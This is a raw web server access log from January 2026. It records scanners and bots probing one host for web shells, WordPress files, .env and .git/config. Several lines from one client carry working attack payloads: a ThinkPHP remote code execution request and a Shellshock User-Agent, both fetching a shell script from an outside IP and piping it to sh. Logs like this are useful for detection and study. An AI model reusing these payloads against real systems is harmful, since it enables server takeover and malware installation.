52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/styles.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/goods.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/403.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/themes/finley/min.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/class.api.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/az.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/155.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/oo.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/vx.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/geck.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/to.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/horeg.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wen.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/sfudq.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file2.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-22.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/asx.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/xa.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/dox.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/size.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ng.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/a2.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/page.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/z60.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/sf.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/qual.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/12.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/s.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cong.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/simple.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/11.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/css/colors/about.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-includes/Text/about.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/upl.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/past.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/revision.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/baxa1.phP8" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/test1.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/massby2.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/doc.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/abc.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/m.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/images/admin.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/error.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ma.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/mh.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/dropdown.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-configs.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/item.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ws46.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/mini.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/gecko.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/x.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:28:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/lala.php" [Client 52.169.148.186] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:05:30:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:05:35:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 151.242.144.223] [Length 1033] [Gzip -] "python-requests/2.31.0" "-" +[23/Jan/2026:05:35:59 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:05:38:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 167.172.128.105] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[23/Jan/2026:05:41:27 +0000] 200 - GET http 91.82.83.208 "/" [Client 142.93.249.216] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[23/Jan/2026:05:45:43 +0000] 400 - GET http 91.82.83.208 "/" [Client 3.134.148.59] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[23/Jan/2026:05:47:02 +0000] 400 - GET http 91.82.83.208 "/" [Client 3.134.148.59] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[23/Jan/2026:05:48:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 143.198.122.12] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[23/Jan/2026:05:50:38 +0000] 400 - - http localhost "-" [Client 3.134.148.59] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:05:54:37 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:05:55:25 +0000] 400 - - http localhost "-" [Client 3.134.148.59] [Length 0] [Gzip -] "-" "-" +[23/Jan/2026:06:02:19 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:06:04:10 +0000] 400 - GET http 91.82.83.208 "/version" [Client 152.32.235.85] [Length 252] [Gzip -] "-" "-" +[23/Jan/2026:06:04:10 +0000] 400 - GET http 91.82.83.208 "/" [Client 152.32.235.85] [Length 252] [Gzip -] "-" "-" +[23/Jan/2026:06:04:11 +0000] 400 - GET http 91.82.83.208 "/" [Client 152.32.235.85] [Length 252] [Gzip -] "-" "-" +[23/Jan/2026:06:04:11 +0000] 400 - GET http 91.82.83.208 "/v1" [Client 152.32.235.85] [Length 252] [Gzip -] "-" "-" +[23/Jan/2026:06:04:13 +0000] 400 - - http localhost "-" [Client 152.32.235.85] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:06:04:14 +0000] 400 - - http localhost "-" [Client 152.32.235.85] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:06:04:16 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:06:04:16 +0000] 400 - GET http 91.82.83.208 "/" [Client 152.32.235.85] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[23/Jan/2026:06:04:18 +0000] 400 - GET http 91.82.83.208 "/" [Client 45.142.154.63] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[23/Jan/2026:06:04:19 +0000] 400 - GET http 91.82.83.208 "/" [Client 152.32.192.241] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[23/Jan/2026:06:04:41 +0000] 200 - GET http 91.82.83.208 "/" [Client 159.65.217.21] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[23/Jan/2026:06:13:57 +0000] 200 - GET http 91.82.83.208 "/" [Client 192.241.159.109] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[23/Jan/2026:06:17:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 67.207.81.172] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[23/Jan/2026:06:18:08 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:06:18:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:06:20:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:06:20:57 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.48.23.79] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[23/Jan/2026:06:21:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:06:21:52 +0000] 200 - GET http 91.82.83.208 "/" [Client 159.65.223.227] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[23/Jan/2026:06:22:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 157.245.240.222] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[23/Jan/2026:06:30:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 2.40.192.234] [Length 1033] [Gzip -] "-" "-" +[23/Jan/2026:06:32:53 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.100.11.243] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[23/Jan/2026:06:43:52 +0000] 400 - - http localhost "-" [Client 2.57.121.22] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:06:46:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:06:51:17 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:06:53:15 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:07:00:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 165.227.90.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[23/Jan/2026:07:01:11 +0000] 400 - - http localhost "-" [Client 20.172.70.65] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:07:04:41 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:07:08:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 54.236.61.138] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" "-" +[23/Jan/2026:07:08:26 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:07:08:26 +0000] 200 - GET http 91.82.83.208 "/" [Client 23.20.84.19] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[23/Jan/2026:07:10:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:07:11:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:07:12:52 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:07:17:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:07:25:27 +0000] 200 - GET http 91.82.83.208 "/" [Client 161.142.158.114] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 OPR/106.0.0." "-" +[23/Jan/2026:07:27:13 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.41] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:07:27:16 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.41] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:07:30:23 +0000] 200 - GET http 91.82.83.208 "/" [Client 115.96.28.203] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[23/Jan/2026:07:30:24 +0000] 405 - POST http 91.82.83.208 "/" [Client 115.96.28.203] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[23/Jan/2026:07:36:17 +0000] 404 - POST http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[23/Jan/2026:07:36:17 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%29%7Csh" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[23/Jan/2026:07:36:17 +0000] 404 - POST http 91.82.83.208 "/index.php?s=captcha" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[23/Jan/2026:07:36:17 +0000] 200 - GET http 91.82.83.208 "/" [Client 192.159.99.95] [Length 1033] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.\x5Cqre.sh?=6f71068b||busybox wget -qO- http://41.231.37.153/rondo.\x5Cqre.sh?=6f71068b||curl -s http://41.231.37.153/rondo.\x5Cqre.sh?=6f71068b)|sh\x22& # rondo2012@atomicmail.io" "-" +[23/Jan/2026:07:36:17 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 192.159.99.95] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:07:37:46 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:07:38:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:07:40:12 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 104.248.247.114] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[23/Jan/2026:07:40:12 +0000] 404 - GET http 91.82.83.208 "/.git/config" [Client 104.248.247.114] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[23/Jan/2026:07:47:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 13.89.125.255] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[23/Jan/2026:07:48:03 +0000] 404 - GET http 91.82.83.208 "/developmentserver/metadatauploader" [Client 172.202.117.178] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[23/Jan/2026:07:48:06 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:08:01:28 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:08:01:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:08:07:37 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 205.210.31.135] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:08:07:37 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 205.210.31.135] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:08:09:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:08:12:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:08:15:11 +0000] 200 - GET http 91.82.83.208 "/" [Client 54.237.193.27] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" "-" +[23/Jan/2026:08:15:12 +0000] 200 - GET http 91.82.83.208 "/" [Client 3.214.174.148] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[23/Jan/2026:08:15:12 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:08:16:01 +0000] 200 - GET http 91.82.83.208 "/" [Client 167.94.146.50] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[23/Jan/2026:08:16:02 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.146.50] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:08:16:02 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.146.50] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:08:16:07 +0000] 404 - GET http 91.82.83.208 "/wiki" [Client 167.94.146.50] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[23/Jan/2026:08:16:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.146.50] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:08:18:11 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" +[23/Jan/2026:08:19:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.159.149.216] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[23/Jan/2026:08:20:49 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[23/Jan/2026:08:21:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 172.237.109.172] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" +[23/Jan/2026:08:25:10 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:08:27:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] 